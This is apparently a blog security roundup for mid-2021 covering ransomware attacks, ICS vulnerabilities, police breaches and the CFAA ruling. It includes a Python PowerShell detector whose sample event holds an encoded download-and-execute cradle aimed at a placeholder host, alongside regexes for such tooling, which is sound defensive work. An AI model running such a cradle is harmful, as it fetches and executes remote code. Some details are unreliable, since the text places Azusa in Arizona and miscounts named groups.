2021 Week 20 - 23 Security Roundup

 

Summary

Sorry for the delay.  I had training for work and a class that I thought would be 6 weeks that turned out to be 3 weeks which took up all my time.  This is longer than normal for that reason and also because there was a lot of news.  I also want to apologize for some formatting issues.  Somehow I managed to break the blogger editor on this post.  It might be because of the size.  Hopefully, all will be back to normal next week.

A lot of different topics to cover this week.  Both old and new.  This includes more information on the Darkside attack, several new attacks on local governments, and emerging techniques used by threat actors.


News

Colonial Pipeline Ransomware Hack

We are learning more and more about this, and the Monday-morning quarterbacks are starting to second-guess everything.  One thing that has come out is that, much like in the Ireland HSE attack earlier this year, the decryptor was produced so slowly that Colonial was allegedly able to restore systems without it.  It was also disclosed that Darkside lost access to several of its servers and had a large sum of cryptocurrency removed from its accounts.  Was U.S. CyberCom responsible?  They say no, but it is doubtful they would say anything else, as admitting they were the ones could be legally tricky.


Bug in Siemens PLCs could let hackers run code

Siemens has released firmware updates to address a vulnerability in SIMATIC S7-1200 and S7-1500 Programmable Logic Controllers (PLCs) that could allow bad actors to remotely reach protected areas of memory through TCP port 102.  Once in, they could gain unrestricted access and execute code undetected.  This bug has been assigned CVE-2020-15782 with a score of 8.1.  There is currently no evidence that it has been exploited in the wild.
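Because the vector above is network reachability of the S7 protocol port (TCP/102), the practical monitoring question for a defender is "who is talking S7comm to my PLCs, and are they supposed to?"  The following is an added example, not code from the roundup, Siemens, or any vendor: it reads simplified, constructed flow records, keeps only TCP/102 sessions into a constructed PLC subnet, and flags any whose source is not on an allowlist of engineering workstations.  The log format, subnet, and host addresses are all assumptions for illustration; a real firewall or NetFlow export will need its own parser.

```python
"""Flag TCP/102 (Siemens S7comm) sessions to PLCs from hosts that are not
approved engineering workstations.

Added example, not from the roundup or from Siemens. The flow-record format,
the PLC subnet and the workstation addresses are constructed for illustration.
"""
import ipaddress
from dataclasses import dataclass
from typing import List

S7_PORT = 102  # ISO-TSAP / S7comm listens here on SIMATIC PLCs

# Constructed inventory: the PLC subnet and the only hosts that should ever
# open S7comm sessions into it.
PLC_SUBNET = ipaddress.ip_network("10.20.30.0/24")
ENGINEERING_WORKSTATIONS = {"10.20.10.5", "10.20.10.6"}

# Constructed flow records: "<timestamp> <src>:<sport> -> <dst>:<dport> <proto>"
SAMPLE_FLOWS = """\
2021-05-24T08:01:12Z 10.20.10.5:51234 -> 10.20.30.7:102 tcp
2021-05-24T08:02:40Z 10.20.10.6:51240 -> 10.20.30.8:102 tcp
2021-05-24T08:03:05Z 10.20.50.44:43111 -> 10.20.30.7:102 tcp
2021-05-24T08:03:09Z 192.0.2.77:60001 -> 10.20.30.9:102 tcp
2021-05-24T08:04:00Z 10.20.50.44:43112 -> 10.20.30.7:443 tcp
"""


@dataclass(frozen=True)
class Flow:
    ts: str
    src: str
    sport: int
    dst: str
    dport: int
    proto: str


def parse_flow(line: str) -> Flow:
    """Parse one record of the constructed flow format above."""
    ts, src_part, _arrow, dst_part, proto = line.split()
    src, sport = src_part.rsplit(":", 1)
    dst, dport = dst_part.rsplit(":", 1)
    return Flow(ts, src, int(sport), dst, int(dport), proto)


def unexpected_s7_sessions(log_text: str) -> List[Flow]:
    """Return TCP/102 sessions into the PLC subnet from non-approved sources."""
    findings: List[Flow] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        flow = parse_flow(line)
        if flow.proto != "tcp" or flow.dport != S7_PORT:
            continue  # not an S7comm session
        if ipaddress.ip_address(flow.dst) not in PLC_SUBNET:
            continue  # destination is not one of our PLCs
        if flow.src in ENGINEERING_WORKSTATIONS:
            continue  # expected engineering traffic
        findings.append(flow)
    return findings


if __name__ == "__main__":
    for f in unexpected_s7_sessions(SAMPLE_FLOWS):
        print(f"ALERT {f.ts} {f.src} -> {f.dst}:{f.dport} is not an approved engineering host")
```

With the constructed records, the two sessions from 10.20.50.44 and 192.0.2.77 are reported while the approved workstations and the non-S7 HTTPS session are ignored.  The same allowlist is what a segmentation rule on the OT firewall should enforce; the script is the detective control that tells you when the preventive one is missing or bypassed.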



JBS Meat Processing Ransomware

I debated about including this, but it does affect global agricultural infrastructure, so ultimately I decided that the JBS attack warranted some coverage.  This is by far the largest attack against the agricultural industry in history.  JBS has operations in North and South America as well as Australia.  The US FBI attributed the attack on the Brazil-based company to REvil, a Russian-speaking gang that has made news for its extremely large ransom demands in the last few months.  While REvil has not claimed responsibility for the attack itself, in October its representative, known as UNKN, said that the agricultural sector would be the group's next target.
JBS would not answer questions about paying the ransom but did indicate that its backups were not affected by the lockdown.  The White House also declined to answer questions on the attack but made a generic statement that the harboring of privateers and others within Russia's borders would be a topic of discussion in upcoming talks with Vladimir Putin in the coming weeks.


Local Government breached by an APT

The US FBI announced that a new APT group attacked the web server of a municipal government.  After gaining access to the web server, they pivoted to other parts of the IT network.  It appears that the group used a known issue (see links below) in a FortiGate appliance.  The group appears to have used very sophisticated techniques and is suspected of having been active elsewhere.

Fortinet CVEs and news

Government resources


Chinese APT groups still attempting to access Pulse Secure VPNs

As previously discussed, groups acting in the interests of the Chinese government created a toolkit to breach Pulse Secure VPNs used by governments of all sizes in the Western world.  New research indicates that the groups are still actively trying to exploit the bugs covered in CVE-2021-22893.  The bad actors are using four new kits named Bloodmine, Bloodbank, CleanPulse, and RapidPulse.  This brings the number of toolkits designed to take advantage of the bug to 16.  Mandiant's most recent report names the 3 groups as UNC2630 and UNC2717.

Ryuk ransomware group targets victims

The Ryuk group is still actively trying to get into critical infrastructure providers, including health, power, water, energy, schools, and SLTTs (state, local, tribal, and territorial governments).  CISA has general guidance for operators to defend against many common ransomware attacks, which I will link below.  What is new in the latest rounds of attacks is that they have moved away from off-the-shelf hacking tools to gain access to systems and are instead using PowerShell and other tools built into common operating systems to avoid detection.  This has been a trend I have noticed from several threat groups over the last year or so.

CISA guidance
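The shift to PowerShell and other built-in tools described above means there is often no malicious binary to hash-match; what remains visible is how the legitimate tool was invoked.  The following is an added example, not code from the roundup, CISA, or any vendor: it scores Windows process-creation command lines (Sysmon Event 1 or Security 4688 style) for launch patterns that are common when PowerShell is driven by a remote operator rather than an administrator at a console, and it decodes an `-EncodedCommand` payload so the indicators can be matched inside it as well.  The event records, host names, indicator weights, and alert threshold are all constructed assumptions for illustration; the one "suspicious" command line is built at runtime from a benign placeholder URL.

```python
"""Score process-creation command lines for living-off-the-land PowerShell use.

Added example, not from the roundup or from CISA. Event records, indicator
weights and the threshold are constructed for illustration; map the fields
from your own Sysmon / 4688 export before using the logic.
"""
import base64
import re
from typing import Dict, List, Tuple

# Launch patterns that are rare for interactive admins but common for remote
# tooling. Weights are illustrative, not a published scoring scheme.
INDICATORS: Dict[str, Tuple[re.Pattern, int]] = {
    "encoded_command": (re.compile(r"-e(nc(odedcommand)?)?\b", re.I), 3),
    "hidden_window": (re.compile(r"-w(indowstyle)?\s+hidden", re.I), 2),
    "no_profile": (re.compile(r"-nop(rofile)?\b", re.I), 1),
    "bypass_policy": (re.compile(r"(?:-ep|-ex(?:ec(?:utionpolicy)?)?)\s+bypass", re.I), 2),
    "download_cradle": (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I), 3),
    "invoke_expression": (re.compile(r"invoke-expression|\biex\b", re.I), 2),
}
ALERT_THRESHOLD = 4  # constructed; tune against your own baseline


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE text behind -EncodedCommand / -enc / -e, or ''."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""  # not a valid encoded command; match on the raw line only


def score_command(cmdline: str) -> Tuple[int, List[str]]:
    """Match indicators against the raw command line plus any decoded payload."""
    text = cmdline + " " + decode_encoded_command(cmdline)
    hits = [name for name, (pat, _w) in INDICATORS.items() if pat.search(text)]
    return sum(INDICATORS[h][1] for h in hits), hits


def find_suspicious(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return events whose command line scores at or above the threshold."""
    alerts: List[Dict[str, object]] = []
    for ev in events:
        score, hits = score_command(ev["cmdline"])
        if score >= ALERT_THRESHOLD:
            alerts.append({**ev, "score": score, "hits": hits})
    return alerts


def _encode(ps: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample events. The download target is a reserved, non-routable
# documentation name (RFC 2606), not a real host.
BENIGN_SCRIPT = "Get-Service | Where-Object Status -eq 'Running'"
SUSPICIOUS_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "WS-FIN-07", "user": "CORP\\jdoe",
     "cmdline": "powershell.exe -NoProfile -Command " + BENIGN_SCRIPT},
    {"host": "WS-FIN-07", "user": "CORP\\jdoe",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -enc " + _encode(SUSPICIOUS_SCRIPT)},
    {"host": "SRV-DC-01", "user": "CORP\\svc_backup",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\nightly_backup.ps1"},
]

if __name__ == "__main__":
    for a in find_suspicious(SAMPLE_EVENTS):
        print(f"ALERT host={a['host']} user={a['user']} score={a['score']} hits={a['hits']}")
```

Of the three constructed events only the second crosses the threshold; the scheduled backup script's `-ExecutionPolicy Bypass` alone scores too low, which is the point of weighting and summing rather than alerting on any single switch.  The prerequisite is that you actually collect command lines (Sysmon Event 1, or 4688 with command-line auditing enabled) and, ideally, PowerShell script block logging, since a detector like this is only as good as the telemetry feeding it.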



Korenix Technology chips have major vulnerabilities

Korenix makes chips that go into many industrial network switches.  Since the core chips themselves are vulnerable, many of the end products cannot be patched effectively in a timely manner, with some still vulnerable a year after the flaws were disclosed.  This puts much of the world's critical manufacturing and infrastructure, such as water and power production and distribution, at extreme risk.


FBI warns of 16 Conti ransomware attacks targeting healthcare and first responder networks

To date, Conti has hit around 400 agencies worldwide, including 911/dispatch centers, police, emergency medical services, hospitals, municipal governments, and first responders.  Dublin's High Court has issued an injunction against "persons unknown" in response to the attack on Ireland's health system.
TrendMicro has a playbook for responding to Conti/Ryuk ransomware here:  https://success.trendmicro.com/solution/000286405

FBI alert



Azusa and its Police Department breached

The city of Azusa, Arizona made a public notification that certain systems had been breached, resulting in the removal of some information.  They did not specify exactly what, but did indicate it could include Social Security numbers, driver's license numbers, California ID card numbers, passport information, military ID numbers, financial information, medical information, health insurance information, and/or information collected as part of their Automated License Plate Recognition system.  They are asking anyone who has done business with the city or had contact with its law enforcement to monitor their credit.

Clearfield Borough Police Department has a data breach

The Marketo leaked-data marketplace and extortion portal is advertising that it has the entire database of the Clearfield Borough, Pennsylvania Police Department available.  The department is neither confirming nor denying the breach, but a 28 GB sample appears to contain a lot of sensitive data.

Police breaches may affect criminal cases

There is growing concern that these ransomware attacks against police forces in the US and other countries may impact the prosecution of criminals.  A growing trend among attackers is not only to ransom the release of the locked hardware and software systems, but also to threaten release of the stolen information on the dark web or the open internet.  In some cases, the bad actors are even reaching out to the people whose data was taken and demanding payment from them as well.

Texas unemployment System defrauded

Scattered Canary, a Nigerian cybercriminal gang, was tricked into sharing a step-by-step guide on how to commit unemployment identity fraud by cybersecurity firm Agari. Texas joins the states of Hawaii, Florida, Massachusetts, North Carolina, Oklahoma, Rhode Island, Washington, and Wyoming in being defrauded by the group.     



Legislative actions 

The United States Supreme Court narrowed the scope of the U.S. hacking law known as the Computer Fraud and Abuse Act (CFAA).  In a 6-3 ruling, it overturned the conviction of Nathan Van Buren, who was fired and charged under the CFAA for looking up information on a woman one of his informants met at a strip club, in exchange for $5,000.  He argued that while it might have been against department policy to use the state database for such things, it should not be a CFAA violation, as the term "unauthorized use" was too broad to be legally enforceable.  Up until this point, prosecutors had successfully argued that such acts "exceeded authorized access" and were therefore covered under the CFAA.  The ruling means that rogue employees who have legitimate access to work resources cannot be held legally responsible under the CFAA for misusing it; however, it would seem they could still be disciplined or even terminated for such activity.

Brazil has passed new legislation designed to get tough on cyber/online crime.  Law 14.155 altered the Brazilian Penal Code to add stricter penalties for device invasion, theft, and misconduct in digital media environments.  It also stiffened penalties for crimes committed using information gained through fraudulent emails, social networks, or telephone conversations.

The Biden administration is seeking a $750 million budget to respond to SolarWinds and billions more for cyber defense.  The budget requests a 14% increase, to $9.8 billion, and would include money for the Office of the National Cyber Director, a new Cyber Response and Recovery Fund, and increases for the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency.



Jobs

The city of Claremore Oklahoma has an IT tech position they will be hiring for in the coming weeks.  To get more information and apply go to:  https://www.claremorecity.com/jobs
